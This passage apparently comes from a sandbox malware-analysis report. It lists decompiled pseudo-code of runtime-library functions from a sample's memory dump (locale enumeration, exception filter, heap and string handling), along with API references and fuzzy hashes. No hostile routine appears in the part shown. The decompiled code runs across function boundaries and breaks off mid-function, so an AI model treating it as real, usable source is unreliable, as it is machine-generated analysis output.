						} while (_t13 != 0);
						if(E0042B4D0( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x0042b983
0x0042b984
0x0042b986
0x0042b98b
0x0042b98e
0x0042b9b2
0x0042b9e6
0x0042b9e6
0x0042b9b4
0x0042b9b7
0x0042b9e1
0x0042b9e3
0x0042b9bf
0x0042b9bf
0x0042b9c2
0x0042b9c5
0x0042b9c5
0x0042b9c8
0x0042b9cb
0x0042b9df
0x00000000
0x00000000
0x00000000
0x00000000
0x0042b9df
0x0042b9b7
0x0042b9eb

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042B718,00000000,00000000,?), ref: 0042B9AA

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 2123abe2193c738403007aad464ed0bbaf13189636fe1c6511e3c635edd09ebc
Instruction ID: 51157c1039b9e3f48a6d3721deaf29cd5ae80b4af2b6cf62f340dc0e901ddaaa
Opcode Fuzzy Hash: 2123abe2193c738403007aad464ed0bbaf13189636fe1c6511e3c635edd09ebc
Instruction Fuzzy Hash: 21F0F9727001357BDB285B219C467BB7764EF40758F54442BED02A3280EB38FE81C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B471 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042B471(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = E00420590(__ecx, __edx, _t26);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t27 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t27 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E0042B4D0( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
				EnumSystemLocalesW(E0042B74F, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x0042b47e
0x0042b484
0x0042b485
0x0042b488
0x0042b48b
0x0042b48b
0x0042b48e
0x0042b490
0x0042b49e
0x0042b4a1
0x0042b4a4
0x0042b4af
0x0042b4af
0x0042b4b8
0x0042b4bb
0x0042b4c1
0x0042b4c7
0x0042b4c9
0x00000000
0x0042b4c9
0x0042b4cf

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

EnumSystemLocalesW.KERNEL32(0042B74F,00000001,00000000,?,-00000050,?,0042BAF1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0042B4BB

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7c21560e41ddf946b950b202b77448f7aa9be7eab15c110276edaf45683d380b
Instruction ID: 09593bb10243a72730b8656f6155d18adf003b42f32ea2ebef070e7751e73f6f
Opcode Fuzzy Hash: 7c21560e41ddf946b950b202b77448f7aa9be7eab15c110276edaf45683d380b
Instruction Fuzzy Hash: 94F0F6363003186FDB14AF35ACC1A7B7BA1EF80768F55842EF9458B681D779AC42C798

Uniqueness

Uniqueness Score: -1.00%

Function 00422F0B Relevance: 1.5, APIs: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00422F0B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x442030);
				E00413FF0(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E0041BF62( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x444e20 = E0041D8BE( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E00422EFE, 1);
				_t17 =  *0x443048; // 0x35200185
				 *0x444e20 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E00422F7B();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}

0x00422f0b
0x00422f0d
0x00422f12
0x00422f17
0x00422f20
0x00422f26
0x00422f37
0x00422f49
0x00422f4b
0x00422f50
0x00422f55
0x00422f58
0x00422f5f
0x00422f69
0x00422f75

APIs

Part of subcall function 0041BF62: EnterCriticalSection.KERNEL32(?,?,0041FBE7,00000000,00441E68,0000000C,0041FBAE,?,?,00420D1F,?,?,0042072E,00000001,00000364,?), ref: 0041BF71

EnumSystemLocalesW.KERNEL32(00422EFE,00000001,00442030,0000000C,0042332D,00000000), ref: 00422F43

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a47d44a5e4e41d2e69ef6405ec93742fcd48ff33a92604e3cc96b366dca287e9
Instruction ID: 89c38d8e70bf401b92573effb85ba13ad009fefcd96bf8d34471be70a7cddc4e
Opcode Fuzzy Hash: a47d44a5e4e41d2e69ef6405ec93742fcd48ff33a92604e3cc96b366dca287e9
Instruction Fuzzy Hash: 89F03C76A00200EFD700EF58E942B9977B0FB49725F10412BF910972E0C7B959408B48

Uniqueness

Uniqueness Score: -1.00%

Function 0042B38B Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042B38B(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t22;

				_t19 = E00420590(__ecx, __edx, _t21);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t22 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x42b2e4, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0042b397
0x0042b39b
0x0042b39e
0x0042b3a1
0x0042b3a1
0x0042b3a4
0x0042b3a7
0x0042b3bf
0x0042b3c2
0x0042b3c8
0x0042b3ce
0x0042b3d0
0x00000000
0x0042b3d0
0x0042b3d5

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

EnumSystemLocalesW.KERNEL32(0042B2E4,00000001,00000000,?,?,0042BB4F,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0042B3C2

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5258e3358ba57a5c14de2a6c208006c50e95af83b32f1d3d8181a8ca6be8f280
Instruction ID: f05ec71404ababf8a8de12aa76609f2cff9ccbbcd907959a5a23f0dfaf3840ce
Opcode Fuzzy Hash: 5258e3358ba57a5c14de2a6c208006c50e95af83b32f1d3d8181a8ca6be8f280
Instruction Fuzzy Hash: 2AF0A0363002196BCB04DF36E84566ABB94EF82714B5A405AEE058B251C6799982C798

Uniqueness

Uniqueness Score: -1.00%

Function 00413F2C Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413F2C() {

				return SetUnhandledExceptionFilter(E00413F38);
			}

0x00413f37

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00013F38,00413485), ref: 00413F31

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 98a43fc2f77659a5b080a95a43e1b7ac22015822af1f6f731b6c7803508620d2
Instruction ID: d60b6e1cad0b80fe3fc268bdcce277321658407d7a69439cd70f39f9138d5e7f
Opcode Fuzzy Hash: 98a43fc2f77659a5b080a95a43e1b7ac22015822af1f6f731b6c7803508620d2
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0042BCAF Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042BCAF() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x444f1c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0042bcaf
0x0042bcb7
0x0042bcbf

APIs

GetProcessHeap.KERNEL32 ref: 0042BCAF

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3c87e93bf37a240b314e6df6c36cdddcf6e1c06a3cfb8bfc48fb69f960f24d71
Instruction ID: 939d0f99279682e252f0708f7657d5826cd6ae4f0c5921c56d439cf077b71eff
Opcode Fuzzy Hash: 3c87e93bf37a240b314e6df6c36cdddcf6e1c06a3cfb8bfc48fb69f960f24d71
Instruction Fuzzy Hash: C4A02230300200CF83008F32AF0830C3AFCAA8AAC33008038A008C0030FB388B808F08

Uniqueness

Uniqueness Score: -1.00%

Function 00408400 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00408400(void* __ebx, void* __edx, void* __edi, signed int __esi, char _a4) {
				char _v0;
				char _v4;
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v100;
				signed int _v112;
				char _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v140;
				intOrPtr _v204;
				signed int _v216;
				char _v224;
				signed int _v228;
				intOrPtr _v236;
				char _v240;
				signed int _v244;
				signed int _v264;
				signed int _v276;
				signed int _v288;
				signed int _v300;
				signed int _v320;
				signed int _v332;
				signed int _v356;
				signed int _t276;
				signed int _t277;
				signed int _t280;
				signed int _t284;
				signed int _t287;
				signed int _t292;
				signed int _t293;
				signed int _t296;
				signed int _t300;
				signed int _t303;
				signed int _t308;
				signed int _t309;
				void* _t316;
				void* _t317;
				intOrPtr _t318;
				signed int _t345;
				unsigned int _t347;
				void* _t348;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				unsigned int _t369;
				void* _t370;
				signed int _t373;
				signed int _t386;
				signed int _t388;
				signed int _t390;
				unsigned int _t392;
				void* _t393;
				signed int _t402;
				signed int _t404;
				void* _t408;
				signed int _t413;
				signed int _t414;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				void* _t435;
				signed int _t440;
				signed int _t441;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;
				signed int* _t466;
				signed int _t467;
				void* _t468;
				intOrPtr _t469;
				signed int _t470;
				void* _t471;
				signed int _t472;
				void* _t473;
				signed int* _t474;
				signed int* _t475;
				signed int _t483;
				intOrPtr _t491;
				signed int _t499;
				intOrPtr _t505;
				signed int* _t506;
				void* _t510;
				signed int _t514;
				void* _t516;
				void* _t523;
				void* _t526;
				void* _t536;
				intOrPtr _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				intOrPtr _t545;
				signed int _t547;
				signed int _t548;
				signed int _t550;
				void* _t551;
				signed int _t552;
				signed int _t553;
				void* _t554;
				signed int _t555;
				signed int _t556;
				void* _t557;
				signed int _t559;
				signed int _t571;
				void* _t572;
				signed int _t573;
				void* _t574;
				intOrPtr _t575;
				signed int _t576;
				void* _t577;
				signed int _t578;
				signed int _t580;
				signed int _t581;
				intOrPtr _t582;
				void* _t584;
				signed int _t585;
				signed int _t588;
				signed int _t589;
				signed int _t591;
				signed int _t594;
				signed int _t595;
				signed int _t597;
				signed int _t600;
				signed int _t602;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				void* _t612;
				void* _t614;
				void* _t615;
				signed int _t624;
				void* _t625;
				signed int _t627;
				void* _t628;
				signed int _t630;
				void* _t631;
				void* _t633;
				void* _t634;
				signed int _t635;
				void* _t652;
				void* _t654;

				_t570 = __esi;
				_t536 = __edx;
				_t606 = _t624;
				_push(0xffffffff);
				_push(0x431c0c);
				_push( *[fs:0x0]);
				_t625 = _t624 - 0x48;
				_t276 =  *0x443048; // 0x35200185
				_t277 = _t276 ^ _t606;
				_v20 = _t277;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t277);
				 *[fs:0x0] =  &_v16;
				_t3 =  &_a4; // 0x403c79
				_t466 =  *_t3;
				_t482 =  &_v28;
				_v24 = _t466;
				E0041247D( &_v28, 0);
				_v8 = 0;
				_t550 =  *0x444fcc; // 0x2
				_t280 =  *0x444f4c; // 0x6dcb70
				_v36 = _t280;
				if(_t550 == 0) {
					__ecx =  &_v32;
					__eax = E0041247D( &_v32, __edi);
					__eflags =  *0x444fcc - __edi; // 0x2
					if(__eflags == 0) {
						__eax =  *0x444310; // 0x2
						__eax = __eax + 1;
						__eflags = __eax;
						 *0x444310 = __eax;
						 *0x444fcc = __eax;
					}
					__ecx =  &_v32;
					__eax = E004124D5(__ecx);
					__edi =  *0x444fcc; // 0x2
				}
				_t483 = _t466[1];
				_t467 = _t550 * 4;
				__eflags = _t550 -  *((intOrPtr*)(_t483 + 0xc));
				if(_t550 >=  *((intOrPtr*)(_t483 + 0xc))) {
					_t571 = 0;
					__eflags = 0;
					goto L17;
				} else {
					_t571 =  *(_t467 +  *((intOrPtr*)(_t483 + 8)));
					__eflags = _t571;
					if(_t571 == 0) {
						L17:
						__eflags =  *((char*)(_t483 + 0x14));
						if( *((char*)(_t483 + 0x14)) == 0) {
							L20:
							__eflags = _t571;
							if(_t571 != 0) {
								goto L15;
							} else {
								goto L21;
							}
						} else {
							_t462 = E0041265A();
							__eflags = _t550 -  *((intOrPtr*)(_t462 + 0xc));
							if(_t550 >=  *((intOrPtr*)(_t462 + 0xc))) {
								L21:
								_t284 = _v36;
								__eflags = _t284;
								if(__eflags == 0) {
									_t571 = E0041362C(_t467, _t550, _t571, __eflags, 8);
									_t627 = _t625 + 4;
									_v36 = _t571;
									_t40 = _v24 + 4; // 0x428d0824
									_t287 =  *_t40;
									__eflags = _t287;
									if(_t287 == 0) {
										_t552 = 0x43e90c;
									} else {
										_t552 =  *(_t287 + 0x18);
										__eflags = _t552;
										if(_t552 == 0) {
											_t42 = _t287 + 0x1c; // 0x428d0840
											_t552 = _t42;
										}
									}
									E0041247D( &_v88, 0);
									_v84 = 0;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									_v56 = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									_v40 = 0;
									_v8 = 8;
									__eflags = _t552;
									if(_t552 == 0) {
										E00412430("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t606);
										_t608 = _t627;
										_push(0xffffffff);
										_push(0x431c0c);
										_push( *[fs:0x0]);
										_t628 = _t627 - 0x48;
										_t292 =  *0x443048; // 0x35200185
										_t293 = _t292 ^ _t608;
										_v124 = _t293;
										_push(_t467);
										_push(_t571);
										_push(_t552);
										_push(_t293);
										 *[fs:0x0] =  &_v120;
										_t469 = _v100;
										_v128 = _t469;
										E0041247D( &_v132, 0);
										_v112 = 0;
										_t553 =  *0x444fc8; // 0x0
										_t296 =  *0x444f44; // 0x0
										_v140 = _t296;
										__eflags = _t553;
										if(_t553 == 0) {
											E0041247D( &_v36, _t553);
											__eflags =  *0x444fc8 - _t553; // 0x0
											if(__eflags == 0) {
												_t440 =  *0x444310; // 0x2
												_t441 = _t440 + 1;
												__eflags = _t441;
												 *0x444310 = _t441;
												 *0x444fc8 = _t441;
											}
											E004124D5( &_v36);
											_t553 =  *0x444fc8; // 0x0
										}
										_t86 = _t469 + 4; // 0x0
										_t491 =  *_t86;
										_t470 = _t553 * 4;
										__eflags = _t553 -  *((intOrPtr*)(_t491 + 0xc));
										if(_t553 >=  *((intOrPtr*)(_t491 + 0xc))) {
											_t573 = 0;
											__eflags = 0;
											goto L50;
										} else {
											_t573 =  *(_t470 +  *((intOrPtr*)(_t491 + 8)));
											__eflags = _t573;
											if(_t573 == 0) {
												L50:
												__eflags =  *((char*)(_t491 + 0x14));
												if( *((char*)(_t491 + 0x14)) == 0) {
													L53:
													__eflags = _t573;
													if(_t573 != 0) {
														goto L48;
													} else {
														goto L54;
													}
												} else {
													_t435 = E0041265A();
													__eflags = _t553 -  *((intOrPtr*)(_t435 + 0xc));
													if(_t553 >=  *((intOrPtr*)(_t435 + 0xc))) {
														L54:
														_t300 = _v40;
														__eflags = _t300;
														if(__eflags == 0) {
															_t573 = E0041362C(_t470, _t553, _t573, __eflags, 8);
															_t630 = _t628 + 4;
															_v40 = _t573;
															_t101 = _v28 + 4; // 0xd88b04c4
															_t303 =  *_t101;
															__eflags = _t303;
															if(_t303 == 0) {
																_t555 = 0x43e90c;
															} else {
																_t555 =  *(_t303 + 0x18);
																__eflags = _t555;
																if(_t555 == 0) {
																	_t103 = _t303 + 0x1c; // 0xd88b04e0
																	_t555 = _t103;
																}
															}
															E0041247D( &_v92, 0);
															_v88 = 0;
															_v84 = 0;
															_v80 = 0;
															_v76 = 0;
															_v72 = 0;
															_v68 = 0;
															_v64 = 0;
															_v60 = 0;
															_v56 = 0;
															_v52 = 0;
															_v48 = 0;
															_v44 = 0;
															_v12 = 8;
															__eflags = _t555;
															if(_t555 == 0) {
																E00412430("bad locale name");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t608);
																_t610 = _t630;
																_push(0xffffffff);
																_push(0x431c55);
																_push( *[fs:0x0]);
																_t631 = _t630 - 0x14;
																_t308 =  *0x443048; // 0x35200185
																_t309 = _t308 ^ _t610;
																_v228 = _t309;
																_push(_t470);
																_push(_t573);
																_push(_t555);
																_push(_t309);
																 *[fs:0x0] =  &_v224;
																_t575 = _v204;
																_v236 = _t575;
																E0041247D( &_v240, 0);
																_v216 = 0;
																_t556 =  *0x444fd0; // 0x0
																_t472 =  *0x444f40; // 0x0
																_v244 = _t472;
																__eflags = _t556;
																if(_t556 == 0) {
																	E0041247D( &_v32, _t556);
																	__eflags =  *0x444fd0 - _t556; // 0x0
																	if(__eflags == 0) {
																		_t413 =  *0x444310; // 0x2
																		_t414 = _t413 + 1;
																		__eflags = _t414;
																		 *0x444310 = _t414;
																		 *0x444fd0 = _t414;
																	}
																	E004124D5( &_v32);
																	_t556 =  *0x444fd0; // 0x0
																}
																_t537 =  *(_t575 + 4);
																_t499 = _t556 * 4;
																_v32 = _t499;
																__eflags = _t556 -  *((intOrPtr*)(_t537 + 0xc));
																if(_t556 >=  *((intOrPtr*)(_t537 + 0xc))) {
																	_t576 = 0;
																	__eflags = 0;
																	_v32 = _t499;
																	goto L83;
																} else {
																	_t576 =  *(_t499 +  *((intOrPtr*)(_t537 + 8)));
																	__eflags = _t576;
																	if(_t576 != 0) {
																		L91:
																		E004124D5( &_v40);
																		 *[fs:0x0] = _v24;
																		_pop(_t557);
																		_pop(_t577);
																		_pop(_t473);
																		__eflags = _v28 ^ _t610;
																		return E0041361E(_t576, _t473, _v28 ^ _t610, _t537, _t557, _t577);
																	} else {
																		L83:
																		__eflags =  *((char*)(_t537 + 0x14));
																		if( *((char*)(_t537 + 0x14)) == 0) {
																			L86:
																			__eflags = _t576;
																			if(_t576 != 0) {
																				goto L91;
																			} else {
																				goto L87;
																			}
																		} else {
																			_t408 = E0041265A();
																			__eflags = _t556 -  *((intOrPtr*)(_t408 + 0xc));
																			if(_t556 >=  *((intOrPtr*)(_t408 + 0xc))) {
																				L87:
																				__eflags = _t472;
																				if(_t472 == 0) {
																					_t316 = E00408E80(_t472, _t556, _t576,  &_v44, _v36);
																					_t633 = _t631 + 8;
																					__eflags = _t316 - 0xffffffff;
																					if(__eflags == 0) {
																						_t317 = E00403390();
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t610);
																						_t612 = _t633;
																						_push(_t576);
																						_push(_t556);
																						_t550 = _t537;
																						_t578 = _t499;
																						__eflags = _t578 - _t550;
																						if(_t578 == _t550) {
																							L101:
																							return _t317;
																						} else {
																							do {
																								_t505 =  *((intOrPtr*)(_t578 + 0x14));
																								__eflags = _t505 - 0x10;
																								if(_t505 < 0x10) {
																									goto L100;
																								} else {
																									_t318 =  *_t578;
																									_t506 = _t505 + 1;
																									__eflags = _t506 - 0x1000;
																									if(_t506 < 0x1000) {
																										L99:
																										_push(_t506);
																										_t317 = E004138AD(_t318);
																										_t633 = _t633 + 8;
																										goto L100;
																									} else {
																										_t538 =  *((intOrPtr*)(_t318 - 4));
																										_t506 =  &(_t506[8]);
																										__eflags = _t318 - _t538 + 0xfffffffc - 0x1f;
																										if(_t318 - _t538 + 0xfffffffc > 0x1f) {
																											E0041805F(_t472, _t506, _t538);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t612);
																											_t614 = _t633;
																											_t634 = _t633 - 0xc;
																											_push(_t472);
																											_t474 = _t506;
																											_t507 = 0x7fffffff;
																											_push(_t578);
																											_t580 = _v264;
																											_t539 = _t474[4];
																											_v276 = _t539;
																											_push(_t550);
																											__eflags = 0x7fffffff - _t539 - _t580;
																											if(0x7fffffff - _t539 < _t580) {
																												E00401BD0(_t474, 0x7fffffff, _t539);
																												goto L124;
																											} else {
																												_t550 = _t474[5];
																												_t390 = _t539 + _t580;
																												_v32 = _t390;
																												_t600 = _t390 | 0x0000000f;
																												_v28 = _t550;
																												__eflags = _t600 - 0x7fffffff;
																												if(_t600 <= 0x7fffffff) {
																													_t392 = _t550 >> 1;
																													_t507 = 0x7fffffff - _t392;
																													__eflags = _t550 - _t507;
																													if(_t550 <= _t507) {
																														_t393 = _t392 + _t550;
																														__eflags = _t600 - _t393;
																														_t580 =  <  ? _t393 : _t600;
																														_t182 = _t580 + 1; // 0x80000000
																														_t507 = _t182;
																														__eflags = _t507 - 0x1000;
																														if(_t507 < 0x1000) {
																															__eflags = _t507;
																															if(__eflags == 0) {
																																_t550 = 0;
																																__eflags = 0;
																															} else {
																																_t402 = E0041362C(_t474, _t550, _t580, __eflags, _t507);
																																_t539 = _v24;
																																_t634 = _t634 + 4;
																																_t550 = _t402;
																															}
																															goto L117;
																														} else {
																															_t183 = _t507 + 0x23; // 0x80000023
																															_t403 = _t183;
																															__eflags = _t183 - _t507;
																															if(__eflags <= 0) {
																																L124:
																																E00401B30();
																																goto L125;
																															} else {
																																goto L107;
																															}
																														}
																													} else {
																														_t580 = 0x7fffffff;
																														goto L106;
																													}
																												} else {
																													_t580 = 0x7fffffff;
																													L106:
																													_t403 = 0xffffffff80000023;
																													__eflags = 0x80000000;
																													L107:
																													_t404 = E0041362C(_t474, _t550, _t580, __eflags, _t403);
																													_t634 = _t634 + 4;
																													__eflags = _t404;
																													if(_t404 == 0) {
																														L125:
																														E0041805F(_t474, _t507, _t539);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(_t614);
																														_t615 = _t634;
																														_t635 = _t634 - 0x14;
																														_push(_t474);
																														_t475 = _t507;
																														_t508 = 0x7fffffff;
																														_push(_t580);
																														_t581 = _v288;
																														_t540 = _t475[4];
																														_v300 = _t540;
																														_push(_t550);
																														__eflags = 0x7fffffff - _t540 - _t581;
																														if(0x7fffffff - _t540 < _t581) {
																															E00401BD0(_t475, 0x7fffffff, _t540);
																															goto L147;
																														} else {
																															_t550 = _t475[5];
																															_t367 = _t540 + _t581;
																															_v32 = _t367;
																															_t594 = _t367 | 0x0000000f;
																															_v36 = _t550;
																															__eflags = _t594 - 0x7fffffff;
																															if(_t594 <= 0x7fffffff) {
																																_t369 = _t550 >> 1;
																																_t508 = 0x7fffffff - _t369;
																																__eflags = _t550 - _t508;
																																if(_t550 <= _t508) {
																																	_t370 = _t369 + _t550;
																																	__eflags = _t594 - _t370;
																																	_t581 =  <  ? _t370 : _t594;
																																	_t212 = _t581 + 1; // 0x80000000
																																	_t508 = _t212;
																																	__eflags = _t508 - 0x1000;
																																	if(_t508 < 0x1000) {
																																		__eflags = _t508;
																																		if(__eflags == 0) {
																																			_t550 = 0;
																																			__eflags = 0;
																																		} else {
																																			_t386 = E0041362C(_t475, _t550, _t581, __eflags, _t508);
																																			_t540 = _v28;
																																			_t635 = _t635 + 4;
																																			_t550 = _t386;
																																		}
																																		goto L140;
																																	} else {
																																		_t213 = _t508 + 0x23; // 0x80000023
																																		_t387 = _t213;
																																		__eflags = _t213 - _t508;
																																		if(__eflags <= 0) {
																																			L147:
																																			E00401B30();
																																			goto L148;
																																		} else {
																																			goto L130;
																																		}
																																	}
																																} else {
																																	_t581 = 0x7fffffff;
																																	goto L129;
																																}
																															} else {
																																_t581 = 0x7fffffff;
																																L129:
																																_t387 = 0xffffffff80000023;
																																__eflags = 0x80000000;
																																L130:
																																_t388 = E0041362C(_t475, _t550, _t581, __eflags, _t387);
																																_t635 = _t635 + 4;
																																__eflags = _t388;
																																if(_t388 == 0) {
																																	L148:
																																	E0041805F(_t475, _t508, _t540);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t615);
																																	_t606 = _t635;
																																	_t625 = _t635 - 0x10;
																																	_push(_t475);
																																	_t466 = _t508;
																																	_t509 = 0x7fffffff;
																																	_push(_t581);
																																	_t570 = _v320;
																																	_t541 = _t466[4];
																																	_v332 = _t541;
																																	_push(_t550);
																																	__eflags = 0x7fffffff - _t541 - _t570;
																																	if(0x7fffffff - _t541 < _t570) {
																																		E00401BD0(_t466, 0x7fffffff, _t541);
																																		goto L170;
																																	} else {
																																		_t550 = _t466[5];
																																		_t345 = _t541 + _t570;
																																		_v36 = _t345;
																																		_t588 = _t345 | 0x0000000f;
																																		_v40 = _t550;
																																		__eflags = _t588 - 0x7fffffff;
																																		if(_t588 <= 0x7fffffff) {
																																			_t347 = _t550 >> 1;
																																			_t509 = 0x7fffffff - _t347;
																																			__eflags = _t550 - _t509;
																																			if(_t550 <= _t509) {
																																				_t348 = _t347 + _t550;
																																				__eflags = _t588 - _t348;
																																				_t570 =  <  ? _t348 : _t588;
																																				_t252 = _t570 + 1; // 0x80000000
																																				_t509 = _t252;
																																				__eflags = _t509 - 0x1000;
																																				if(_t509 < 0x1000) {
																																					__eflags = _t509;
																																					if(__eflags == 0) {
																																						_t550 = 0;
																																						__eflags = 0;
																																					} else {
																																						_t363 = E0041362C(_t466, _t550, _t570, __eflags, _t509);
																																						_t541 = _v32;
																																						_t625 = _t625 + 4;
																																						_t550 = _t363;
																																					}
																																					goto L163;
																																				} else {
																																					_t253 = _t509 + 0x23; // 0x80000023
																																					_t364 = _t253;
																																					__eflags = _t253 - _t509;
																																					if(__eflags <= 0) {
																																						L170:
																																						E00401B30();
																																						goto L171;
																																					} else {
																																						goto L153;
																																					}
																																				}
																																			} else {
																																				_t570 = 0x7fffffff;
																																				goto L152;
																																			}
																																		} else {
